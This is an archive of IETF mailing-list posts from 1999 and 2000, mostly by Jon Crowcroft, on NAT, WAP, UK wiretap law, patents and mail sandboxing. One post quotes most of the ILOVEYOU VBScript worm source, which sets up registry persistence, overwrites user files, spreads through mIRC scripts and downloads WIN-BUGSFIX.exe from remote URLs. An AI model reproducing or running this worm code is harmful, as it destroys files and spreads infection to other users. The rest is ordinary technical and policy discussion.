of IWQoS 2000, Pittsburgh, PA, June 5-8, pp. 189-197. 

A. Bouch and M. A. Sasse (2000): The case for predictable media
quality in networked multimedia applications. Proceedings of the
ACM/SPIE Multimedia Computing and Networking (MMCN'00), 25-27th
January 2000, San Jose, USA. 

etc etc etc

 cheers

   jon




Re: Heard at the IETF

2000-08-02 Thread Jon Crowcroft


o course, if we were to internationalise the elevator ights, we';d
have to syubtract 1 (as we count from zero, not 1) and then they'd all
be even numbersunless of course one of them was the one even
prime...

In message [EMAIL PROTECTED], 
"Dawson, Peter D" typed:

 oh... did the other members on the elevator dispute 
 the prime number sequence ..I.E as the elevator descended or ascended ?? 
 if so.. 
 then they were part of the ietf convention 
 else
 they were a bunch of normal geeks
 
 
 --Original Message-
 -From: Dennis Glatting [mailto:[EMAIL PROTECTED]]
 -Sent: Wednesday, August 02, 2000 11:57 AM
 -To: [EMAIL PROTECTED]
 -Subject: Heard at the IETF
 -
 -
 -
 -
 -Based on an experience of mine last night.
 -
 -   Q: How can you tell if you are at a convention
 -  with a bunch of geeks?
 -   A: When you are in a crowded elevator and 
 -  someone looks down at the panel of lit 
 -  buttons and says: look, they're all prime 
 -  numbers!
 -
 -
 -
 -
 

 cheers

   jon




Re: Email Privacy eating software

2000-07-18 Thread Jon Crowcroft


In message 008601bff09b$8b32e9b0$0a0a@contactdish, Anthony Atkielski type
d:
  Well been British, we are to polite and would not like to make a fuss. :)
 
 Yeah, the ones who liked to make a fuss went off and started their own
 democracies centuries ago.

 So the British really don't mind having their privacy compromised, then?  I
 hope Americans show a bit more concern, before it's too late.

 
next summer's IETF meeting is tentatively scheduled for London, England
http://www.ietf.org/meetings/0mtg-sites.txt

if you turn up at customs with a laptop, you may be asked to show any
and all files on it to the nice chaps there. if someone has sent you
crypted email (say using your public key) you may be obliged to
connect the lapto pto the public net and  access your other key to
decrypt the mail for the nice chaps in customs to priove that it is
not to do with pornography or terrorism - whereeve yo uare from, you
will have no recourse to say "no" or "this is commercial in
confidence" or "my company will fire me if i let this go to anyone or
send it over the net to decrypt at my home site etc etc"

the wavelan in the meeting site may be subject to wiretap...etc etc

the ietf community may wish to send a message by reconsidering having
a meeting in the UKuntil the law here is made more rational.

 cheers

   jon




Re: Email Privacy eating software

2000-07-14 Thread Jon Crowcroft


In message 01dc01bfed78$0e7a55a0$0a0a@contactdish, Anthony Atkielski type
d:

 I don't understand why the FBI feels that it needs to have a top-secret
 black box attached to the ISP's network.  Why not just have the ISP provide
 a copy of all e-mail to or from the specified mailbox?


wiretap is a weapon in the FBI's armoury

in the US, YOU have the right to bear arms

You should demand the constitutional right to wiretap the FBI and CIA and so 
on right now.

that will fix things.

j.




Re: Email Privacy eating software

2000-07-14 Thread Jon Crowcroft


In message [EMAIL PROTECTED], 
"Parkinson, Jonathan" typed:

 In the UK we have the same type of problem, this time from my Favorite
 Company MI5.

I agree.
i also think that there are important lessons for lawmakers in other countries,
so it is a suitable subject for IETF discussion.

 'The UK is leading the world when it comes to high-tech spying on its
 citizens'
 Please see
 http://news6.thdo.bbc.co.uk/hi/english/sci/tech/newsid_762000/762514.stm=

yes, this is something that the UK should be ashamed of  - there is
very good documentary evidence that the government is ignoring
technical advice on the costs ot the ISP community in terms of
implementing this they wayu that the UK law was designed, or the risks
to citizens, and the loss of revenue when content and application
providers move their business to palecs which implement less stupid,
expensive and ineffective ways to intercept criminal or terrorist 
communication - the home offices response to criticism was a
masterpiece of political rubbish, and included specific items which
were lies.  examples include assertions about what other coutnries
were doing in terms of techniocal implementations of both intercept,
and who gets charged for the implementation cost.

 Lets face it, internet service providers will be forced to install =
 black
 boxes in their=20
 data centres that connect directly to an MI5 monitoring centre in =
 London.
 Now that would=20
 be nice to hack into. =20

when it happens, it will be a good day for demoracy.

one trick to do is to put a bunch of fake data on the net whch causes them
to either act on it, or have to randiomize whether they act or not
(see cryptonomicon) so that real miscreants wont be able to tell they
are listening (fairly standard stuff in fact) - turns out that there
are several ways to put in place random traffic generators (which even
more interestingly can also be part of billing systems) that run 
counter-intuitive, but make it very hard to do RIP but do allow one to
retain privacy.

 More to the point, Who is going to fund this? 'thinking' Oh yes thats =
 why
 Petrol in the=20
 UK has now passed the =A31.03 per litre barrier.
 'http://www.rip-off.co.uk/fuel.htm'=20

 :-)

right - but in that case, we can take public transport or buy a bike -
in the case of ecommerce, it can go elsewhere and the UK loses.

note that a lot of the GRID users are talking about striping data over
multiple paths (yes, and at 1.2Gbps per path) so the data copy costs
of intercept are more than double the data transfer  - in fact they
would be just with normal dynamic routing

the reason the UK bill is confused is that it was written by
telephants - people who probably lost their jobs as the tradditonal
phone business goes marginal and now advise shady organisations such
as gchq - these folks understand that the Exchange in the PSTN is the
natuaral point for billing and is therefore also quite a reasnable
palce to do intercept 

what they dont get is that there is no natural point to do this in a
packet net, least of all a datagram, end to end network, except at the
end points.


what annoys me is that the UK government has persistnytly caimed that
ALL opponents  of the bill oppose intercept, when in fact almost all
the ones I've spoken to object to a STUPID pointless waste of money,
not to intercept at feasiable (E.g. end systems - such as email
servers, web, web cachce/proxy, napster server etc) points

 -Original Message-----
 From: Jon Crowcroft [mailto:[EMAIL PROTECTED]]
 Sent: Friday, July 14, 2000 12:03 PM
 To: Anthony Atkielski
 Cc: ietf
 Subject: Re: Email Privacy eating software
 
 
 
 In message 01dc01bfed78$0e7a55a0$0a0a@contactdish, Anthony =
 Atkielski
 type
 d:
 
  I don't understand why the FBI feels that it needs to have a =
 top-secret
  black box attached to the ISP's network.  Why not just have the ISP
 provide
  a copy of all e-mail to or from the specified mailbox?
 
 
 wiretap is a weapon in the FBI's armoury
 
 in the US, YOU have the right to bear arms
 
 You should demand the constitutional right to wiretap the FBI and CIA =
 and so
 
 on right now.
 
 that will fix things.
 
 j.

 cheers

   jon




Re: draft-ietf-nat-protocol-complications-02.txt

2000-07-10 Thread Jon Crowcroft


 Any comments on the content of the draft? 

I would go further - first to define by exclusion, secondly to define
a new class of providers (according tro common uisage) so that
discussion can proceed 

An ISP _hosts_ its own and customer's hosts.  Hosts follow the 
hosts requirements RFC, at least.

An ISP uses routers to interconnect its, its customers, and other to ISPs
networks, Routers follow the router requirements RFC, at least.

Service Organisations that don't allow a host or router that follows the above
definition to excercise capabilities defined are what we now know as
Content Service Providers, and must provide application level gateways, 
Application Service Providers, and offer portals or ALGs. In each case there
may be good performance or security reasons for this mode of service, but
there will usually be lack of flexibility or ease of introdution to new
services, content and applications in general. 

personal comment
Other classes of organisation may simply be providing a subset of
internet services - I don't see a market or technical case for these
and in fact would encourage regulatory bodies to see if these types of
organisations are trying to achieve lock out or are engaged in 
other types of monopolistic or anti-competitive behaviour. :-)

cheers
j.




Re: Is WAP mobile Internet??

2000-07-05 Thread Jon Crowcroft


 Jon, I wonder how WAP will fit into  Multicast apps - even 
 if its single line txt based msg's app ?
 
football scores/(tennis etc)

share price (look at stockbroker trading terminal - they have very
small amount of realestate for the given instrument)

many many things would work v. well  - iff you had full ip capability...

i guess you'd need an rtp mixer capability in the net for packet ip multiast as
mixing at the receiver might stress the limited capacity...although as
next generation rolls out, this might change too then ip voice
conferencing using multicast (which kind of maps well onto real shared
capacity channels anyhow) would be quite cute...

a lot of sip stuff would be v. cute too (a lot of fancy call handling
scripting things would be dead useful to be able to download onto the
phone.)...

 cheers

   jon




Re: WAP - What A Problem...

2000-06-30 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Alan Simpkins t
yped:

 Valdis, I agree with you a hundred percent. The most
 expensive part of infrastructure is pulling the
 cables/fiber necessary to build the infrastrucuture.

thats why intelsat and a cosortium of telcos has a charity that built
a box that is solar powered and provides n gsm phones access + 1
64kbps uplink/downlink to geostatinary atellites

actualyl, a LOT of places that are really poor in the world dont even
have electricty- but they can get batteries and if they use sms (e.g.
for calling emergency service/flying doctors/vets etc), they
can make them last quite a long time
 
 --- [EMAIL PROTECTED] wrote:
  On Fri, 30 Jun 2000 00:41:37 +0200, Anthony
  Atkielski [EMAIL PROTECTED]  said:
   If they are that lacking in mere wires, they
  probably aren't in a position
   to profit from access to the Internet in the first
  place.  That is, if they
   lack telephones (and that's all they need for
  broadband, or at least it's
   the better part of the battle), why would they be
  surfing the Web?  First
   things first.
  
  The fact that they lack wires doesn't mean they lack
  telephones.
  
  Remember that wires are expensive to pull,
  especially for those 3 houses
  out on the far side of the mountain down the dirt
  road.
  
   Countries without landlines are not going to be a
  part of the global economy
   unless they upgrade in a major way very soon.
  
  You got this wrong.  Countries without
  *connectivity* will be screwed. There's
  no *obvious* requirement that there be a landline
  involved.
  
  Having said that, I'm *not* a WAP proponent. ;)
  -- 
 Valdis Kletnieks
 Operating Systems Analyst
 Virginia Tech
  
  
 
  ATTACHMENT part 2 application/pgp-signature 
 
 
 
 __
 Do You Yahoo!?
 Get Yahoo! Mail - Free email you can access from anywhere!
 http://mail.yahoo.com/
 

 cheers

   jon




Re: Bluetooth is a flaucipaucinihilipilification...

2000-06-28 Thread Jon Crowcroft


In message [EMAIL PROTECTED], 
"Parkinson, Jonathan" typed:

  Anyone care to start a discussion about Bluetooth and how it
 may/will impact the future of communications ? And the new generation of
 Virus's that could come along with this technology.
 
no. but a email thread on
bluetooth is just scsi without copper
might be interesting:-)

j.




Re: Free Protocols Foundation Policies and Procedures -- Request For Review

2000-06-21 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Mohsen BANAN-Public 
typed:

 I request that you review the attached document and
 email us your comments to:   
   mailto:[EMAIL PROTECTED]

its a nice idea

there is, after all, a free market in standards orgaanisations

however, the ietf is the  one with the monopoly at the moment...so
i thinkwithout an RFCm you are left holding an anti-trust suit without
a lawyer to bet on



but your meta-case in terms of the content is fine

cheers
job




Re: mail sandbox wall authority, inward and outbound

2000-05-12 Thread Jon Crowcroft



the problem with sandboxes is that they are monolithic as is this
discussion of mail - if i have a notion of a compartmentalized system
with users, and access rights (like almost all operating systems from the
late 60s onwards, but not like
simple desk top single user executives as found on many personal
computers today unfortuantely),
then i can have mail agents run scripts, but with the authorities of
the user, perhaps restricted further by some context, and i can then
configure arbitrary rights w.r.t each possible tool that the script
might invoke - some of these can be gathered togethre under the
headings of "file input, output, exectution, creation etc", and others
under the rights of "audio/video/mouse/itneraction with user",
"network i/o to such and such an address (list)", etc
for conveneicnce and expressiveness in the ACL system (other
management tools like user, other, groups etc help scale the task)
and then i can design a set of sensible securioty policies for a site,
and employ an expert to configure things for everyone - typically,
with good systems, defaults and default operating system notions of 
user, file permissions, sudo type access etc, will suffice...

iff you start with a decent system;
otherwise, forget it - someone will always find a way to set things up
disastrously wrong, because it will be the only way to get work done
this is a standad problem with systems that impose all or nothing
security - either they leak like a sive or users find them
unusable...
so the solution is to ditch indecent systems. 

In message [EMAIL PROTECTED], Leonid Yegoshin typed
:

 From: "James P. Salsman" [EMAIL PROTECTED]
 
 A MUA might ask the console operator for permission to proceed when:
 
 1. A mail message wants to run a program.  (e.g., ECMAscripts.)
 
 2. An attachment is executable. (Nearly universal practice.)
 
 3. A program wants to write to a file.  (Usually not trapped more
 than once per execution if at all.)
 
 4. A program wants to read your address book.  (Does any mail system
 that offers this functionality limit it at all?)
 
 5. A program wants to send mail.  (e.g., having MAPI's Send notify
 the user and queue the proposed message as a draft instead of sending.)
 
  6. A program wants to send a file to somewhere. Or any permanently stored
 information (like cookie but not limited).
 
 - Leonid Yegoshin.
 

 cheers

   jon




Re: WORM WARNING

2000-05-11 Thread Jon Crowcroft


if once it was a virus 
which it wasnt
it surely is a worm now

of course, 
microsoft have succeeded beyond david tenenhouses wildest dreams
in active network deployment

:-|
j.




Re: IPv6: Past mistakes repeated?

2000-05-08 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Paul Robinson typed:

 Even better, why doesn't the IETF employ a bunch of people dressed in
 black suits and wearing sun glasses to go around and 'enforce' IPv6...

we do, but you keep forgetting.

:-)

j. iab member, and official "man in black"




Re: VIRUS WARNING music at pittsburg?

2000-05-07 Thread Jon Crowcroft



1/ i think microsoft and the alleged hacker have provived an exxcellent lesson in 
active networks

2/ is anyone interested in jamming at the next IETF (folk, jazz, rock, thrash, triphop 
etc - you know, primal
scream...) - i  can bring a guitar (or bass or flute or something...) but local folks 
would 
be easier on the wrists!!!


j.




Re: VIRUS WARNING

2000-05-04 Thread Jon Crowcroft



"noone ever got fired for buying ibm"

this was ironic coz ibm was expensive, but worked 

someone should get fired for buying someone elses prodiucts
 irony

no class action

just reality checkpoint time...

for a systemic view, 
some stuff is engineered better than other stuff - see mark handly's
excellent letter to the new york times, post melissa

the best reason for diversity is not anti-capitalist, its darwinian.

meanwhile, eres some visaual basic.

j.

cut here and paste to yor favourite waste disposal===
 filename="LOVE-LETTER-FOR-YOU.TXT"

rem  barok -loveletter(vbe) i hate go to school
rem by: spyder  /  [EMAIL PROTECTED]  /  @GRAMMERSoft Group  /  
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting 
Host\Settings\Timeout")
if (rr=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting 
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem"\MSKernel32.vbs")
c.Copy(dirwin"\Win32DLL.vbs")
c.Copy(dirsystem"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSK
ernel32",dirsystem"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServ
ices\Win32DLL",dirwin"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet 
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw65
87345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546
786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOh
fgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUg
qwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN
-BUGSFIX",downread"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start 
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)  
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") 
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec"\"bname".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eqfolderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") 
or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine ";  Please dont edit this script... mIRC will corrupt, if 
mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run 
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 

Re: draft-ietf-nat-protocol-complications-02.txt

2000-05-01 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Masataka Ohta ty
ped:
 
  Is it fair if providers using iMODE or WAP are advertised
  to be ISPs?
 
  Is it fair if providers using NAT are advertised to be ISPs?
 
 My answer to both questions is
 
  No, while they may be Internet Service Access Providers and
  NAT users may be IP Service Providers, they don't provide
  Internet service and are no ISPs.

i agree:
in the UK, i would say that someone claiming internet access via WAP
would be in breach of the trades description act.

 Any oppositions?
 
not from here (for wap - i dont know enough about iMODE to comment)
  Masataka Ohta
 

 cheers

   jon




Re: draft-ietf-nat-protocol-complications-02.txt

2000-04-27 Thread Jon Crowcroft


In message [EMAIL PROTECTED], "J. Noel Chiappa" typed:

  right, noels wrong.
 
 Noel is happy to wait, and see who's right. (I've been through this exact
 same experience before, with CLNP, so I understand the life-cycle.) So far,
 I've been waiting for quite a few years with IPv6, and so far I'm right.

 Let's see, how many years have these standards been out, and how much
 deployment has there been? Hmm, RFC-1883 was in December 1995. Can you point
 me to *any* other IETF product that, 5 years after the Proposed Standard came
 out, still hadn't been significantly deployed - and then went on to be a
 success?

 No?

wrong - multicast.

 I didn't think so.
 
read again  - LOTS of things have seen almost no deployment since
being standar,d and lots of things haev seen deploymewnt (e.g. napster
hit around 15% of college traffic) without even a breath of an i-d
 
  NATs are not only bad e2e karma, they are bad tech

 I'm not denying that - and I've said as much. All address-sharing devices are
 problematic, and some (e.g. NAT boxes) are downright disgusting kludges.
 
 However, history shows that bad tech doesn't magically replace itself, it has
 to be replaced by an economically viable alternative. (For an example of this
 principle in action, note that the vast majority of cars are still powered by
 reciprocating internal-combustion engines... talk about poor basic concept!
 But I digress)

i agree...

 Judging from the real world out there, it appears that IPv6 isn't a viable
 alternative.

i agree its not worth holding one's breath...

 cheers

   jon




Re: draft-ietf-nat-protocol-complications-02.txt

2000-04-23 Thread Jon Crowcroft



henning,

good stuff...
people would do well to read this - 

also, all attempts to fix NATs so as to ameliorate these problems
have _exactly_ the same deployment complexity as IPv6 - there's a
quote somewhere from yakov rehkter to this effect (can't find it
exactly, but he was coming the ther way saying why dont we use NATs
instead of v6 - same difference)


by the way, at least one router vendor has now lost a large contract
to a competitor becuase it couldn't provide v6 routing (forwardig,
yes, routing, no) so perhaps we'll see the situation change quite
fast now:-)

In message [EMAIL PROTECTED], Henning Schulzrinne typed:

 It might be useful to point out more clearly the common characteristics
 of protocols that are broken by NATs. These include, in particular,
 protocols that use one connection to establish another data flow. Such
 protocols include ftp, SIP and RTSP (the latter is not mentioned yet in
 the draft, but NATs also interfere with its operation). Note that unless
 we forego such control protocol designs altogether, NATs in principle
 break these unless every host has an external DNS mapping. (Thus, in
 reference to a recent message to just design NAT-friendly protocols,
 this means in practice that such "out-of-band" designs could not be
 supported by this NATy version of the Internet. In effect, this leads to
 the abomination of carrying real-time data in HTTP connections.)
 
 Other protocol designs are those that are symmetric rather than
 client-server based. This affects all Internet telephony or event-based
 protocols (IM and generalizations) unless they maintain an outbound
 connection with a server acting as their representative to the globally
 routed Internet. The latter obviously does not address the media stream
 addressing problems.
 
 -- 
 Henning Schulzrinne   http://www.cs.columbia.edu/~hgs
 

 cheers

   jon




Re: Source address (offtopic)

2000-04-13 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Matt Crawford typed:

  The source address of a datagram was an architectural mistake, and should 
  never have been in the mandatory packet format.
 
 Nahh, the mistake was ignoring the source address when routing  forwarding.

thats an implementation detail not a design mistake.

there's plenty of fast classifier algorithms and data structures now
for the 5-tuple which reender  this debate academic - in fact, i think
the lack of a idee fixe about flow id, versus src or dst or src+dst
based routing, versus route hint +eid and so on is the _strength_ of
the tcp/.ip model-  the very lack lack of strong noel complains about
 foresight led to diversity and design freedom

 cheers

   jon




Re: recommendation against publication of draft-cerpa-necp-02.txt

2000-04-10 Thread Jon Crowcroft


  Bottom line is that IP-layer interception - even when done "right" - 
  has fairly limited applicability for location of nearby content.
  Though the technique is so widely mis-applied that it might still be 
  useful to define what "right" means.
 
 That sounds overly optimistic.


user experience/expectation context is verything

TCP end2end ness?
if you access a web page from our server, chances are its fectehc by one
of several httpds from one of a LOT of NFS or samba servers, which,
depending on local conditions.

if you send audio on the net, its quite possible it goes through several
a2d and d2a conversions (.. thru a PSTN/SIP or 323 gateway) - in fact,

if you speak on an apparently end2end PSTN
transatlantic phone call, chances are your voice 
is digitzed and re-digitzed several times by transcoder/compressers

its the 21st century:
f you dont use end2end crypto, then you  gotta expect people to optimize
their resources to give you the best service money can buy for the least
they have to spend.

hey, when you buy a book written by the author, it was usually typeset,
proofread, and re-edited by several other people

even this email may not be from me...

 cheers

   jon
"every decoding is an encoding"
maurice zapp from the Euphoric State University, in small world, by david lodge




Re: A thought about patents

2000-04-08 Thread Jon Crowcroft


as ye sow, so shall ye weep...in reading this thread i guess i saw
several problems:

oxymoron alert
"thought...patent"

tautology alert
"sufficiently expensive...lawyer"

internet bogon alert
"find the server"

is a server where the ip address, DNS name, lat/long of the CPU,
memory, disk, or cache, transprent or otherwise is"

sorry,
all bets are off about this dicussion except in the presence of the
european union, where all bets are subject to VAT 

:-)



In message [EMAIL PROTECTED], John Stracke typed:

 Masataka Ohta wrote:
 
   Even if it's not true in the general case, a sufficiently expensive lawyer
   might be able to convince the court that, since the Internet makes location
   irrelevant, the location of the infringement is irrelevant.
 
  that US patents are applicable even if both servers, clients and network
  inbetween are all located outside of US?
 
 No, not that; but, if the server is outside the US and the client is inside, then
 maybe.
 
 --
 /=\
 |John Stracke| http://www.ecal.com |My opinions are my own.   |
 |Chief Scientist ||
 |eCal Corp.  |"Where's your sense of adventure?" "Hiding under|
 |[EMAIL PROTECTED]|the bed."   |
 \=/
 
 
 

 cheers

   jon




Re: Topology Discovery in IP Networks

2000-04-01 Thread Jon Crowcroft


infocom 2000 had 2 sessions (8 papers) from the main people - check
out their web site (papers are online..ia ieee)
In message [EMAIL PROTECTED], Barbara Bao typed:

 Dear Friends,
 
 For my assignment, I need to know algorithms for discovering layer-3 and
 layer-2 network topology. Where can I find those papers? Any information
 and advice are highly appreciated.
 
 Barbara
 

 cheers

   jon




Re: A thought about patents

2000-04-01 Thread Jon Crowcroft


 My thought is this:  I'd like to see a presumption of lack of novelty if an 
 idea gets raised in a public forum, even if it happens _after_ a patent has 
 been applied for, unless it can be shown that the information came from 
 leakage of proprietary information.
 
intersting idea

i would liek to offer another:-

perhaps the length of patent protection should be directly related to
the cost of developing an idea - in pharmaceutical industry, long
patents make sense because of the large investment in testing a new
drug safely - similar i nthe automotive and aero industries

in software, its pretty obvious that this is silly - one-klik took
someone about 6 nanoseconds to think up, and 3 to test...

 Maybe such an approach might ameliorate the "gold rush" mentality to be the 
 first to slap a patent on an idea or technique that is coming to be 
 accepted art in the normal process of technology evolution.

the ietf has a very good protection in principle against people who
think that a patent is power to "own" a standard - it would be nice
to try to identify the mistaken "stakeholders" who belive that 
patents are a weapon...
 

 cheers

   jon




Re: Re[2]: Re: Critically compare the congestion control on TCP/

2000-03-10 Thread Jon Crowcroft


the best work i know of on TCP behaviour _over_ ATM services is the
thesis (and papers by) Olivier Bonaventure - 
http://www.info.fundp.ac.be/~obo/

 cheers

   jon



history

2000-03-09 Thread Jon Crowcroft


i was looking thru some old archives (1982 on - yes, thats right, from
just before this years college kids were born)
of the original tcp-ip maillist
and came across a message from mark crispin about a broken vax mailer
flooding neighbor mailservers with SYNs..amazing how nothings new

see
http://www-mice.cs.ucl.ac.uk/multimedia/misc/tcp_ip/
for a slightly incomplete archive of it all
i couldn't find any other archive but if someoen does have it, let me
know and i'll delete mine and point at theirs...

one interesting thing is to look at pre-DNS email addresses - so there
used to be this single file we'd all FTP from ISI with the hosts.txt
listing of name/addresses  - then one day we distributed itnow of
course has to haev a .com, and the nameservers have to zone xfer it
all the time tooso plus ca change, plus c'est le mome raths

 cheers

   jon



Re: IETF Adelaide and interim meetings for APPS WGs

2000-02-16 Thread Jon Crowcroft



to people that think that the internet is mostly US centric, and will
go on being so, and that this is relevant to the IETF anyhow -
wrong, wrong, and also wrong!

um the Internet is now mostly commercial - the Eu and Asia each have MORE
money than the US, and also have growth economies. if you work for a
vendor (s/w, h/w, services) and can't find a reason to visit, then yo
uare missing an opportunity to "enhance shareholder value" - as a
shareholder, i would be shocked and dismayedand think hard about
other vendors...

as an academic/researcher, too, generally, i can easly find good reasons to 
visit people with other viewpoints, and requirements and inventions...
 

note that microsoft and cisco (examples - there are lots more)
 both set up strong european presences
recently for these reasons. They also have strong asia/pacific
presence - 

using current IETF national representation as a marker for where to
hold meetings is going to lag, rather than lead the right thing to do
imho

note also, that provided the IETF doesnt start mimicing ITU in
choosing
meeting location, a lot of places outside the US offset travel costs
by cheaper accomodation costs.significantly in some cases
(i admit london england is not a good example for this, though it is
pretty cheap to get to from just about anywhere on average:-)


 cheers

   jon



Re: IETF Adelaide and interim meetings for APPS WGs

2000-02-15 Thread Jon Crowcroft


In message [EMAIL PROTECTED], 
"Parkinson, Jonathan" typed:

 There is more than America out there ?
 ;-)
 

you mean america still exists - i thought it was actually a myth like
atlantis


 
 
 -Original Message-
 From: John Stracke [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, February 15, 2000 3:21 PM
 To: [EMAIL PROTECTED]
 Subject: Re: IETF Adelaide and interim meetings for APPS WGs
 
 
 Graham Klyne wrote:
 
  But I am still uncomfortable with it.  It implies that, somehow, any
 non-US
  participant is somehow a second class citizen, who is permitted to attend
  purely as a concession by the US elite whose organization this is.  Maybe
  that also is true -- but I don't have to like it.  I very much prefer the
  "pretense"
 
 In other words, the pretense is self-fulfilling: by claiming (and striving)
 to
 be global, the IETF avoids driving away non-US participants, which makes the
 IETF more truly global.
 
 --
 /\
 |John Stracke| http://www.ecal.com |My opinions are my own.  |
 |Chief Scientist |===|
 |eCal Corp.  |Yes, sir, we've graphed the data. It's a smiley|
 |[EMAIL PROTECTED]|face, sir. |
 \/
 
 

 cheers

   jon



Re: Email messages: How large is too large? size matters, not

1999-12-16 Thread Jon Crowcroft



the royal society is going to publish papers from this meeting - the
talks are being made avaiallbe on a best effort (NOT distributed to
people, but made availabe) which seems to me to quite a different
thing from unsolicted unreadable content

if you care, the draft paper and talk i gave are at
ftp://cs.ucl.ac.uk/darpa/royal-society-network-modelling.ps.gz
http://www.cs.ucl.ac.uk/staff/jon/rs/

frank kelly's much more interrsting
paper (as announced at the meeting) is via
http://www.statslab.cam.ac.uk/~frank/smi.html
("Models for a self-managed Internet ")

In message [EMAIL PROTECTED], L
loyd Wood typed:

 jon crowcroft writes:
 
  i dont care what SIZE it is - i only care whether i have the
  application to view it - microsoft users sdjhould be educated in the
  simple fact - not everyone has word or powerpoint or wants to buy
  them - so NEVER EVER send a word or ppt or excel attachment except
  to someone you are co-authoring a paper/talk/expense claim with and
  have agreed the package in advance by text mail

 But distributing a file in an unspecified version of powerpoint which
 then appears on the web to be downloaded by an reader base with an
 unknown toolset is perfectly acceptable?

see the word _attachment_ above.

 http://www.statslab.cam.ac.uk/%7Erichard/research/topics/royalsoc1999/crowcroft.html



 [Royal Society 'network modelling in 21st century' two-day symposium
 
 http://www.statslab.cam.ac.uk/%7Erichard/research/topics/royalsoc1999/

  diffserv, router design, optical and Internet economics stuff. alas,
  neither the slides Van Jacobson prepared nor the slides he actually
  whipped up and gave in response to other presentations are available
  yet. And you'll need powerpoint for some, in the absence of
  postscript files rendered from them.]
 
  publically avaialble standards exist for the excchange of text and
  graphics, and we do not need to tolerate a monopoly who fails to
  serve the maximum public good by failing to publish their
  interchange formats.

 We don't need to tolerate them. We don't have to promote them, either.
 But then that's a matter of convenience; a measure of the difference
 between individual and societal good.

sure - and we could not even bother giving out the talks in any
form - would be nice if people said _thanks_ ever.

 cheers

   jon



Re: Email messages: How large is too large? too much

1999-12-15 Thread Jon Crowcroft



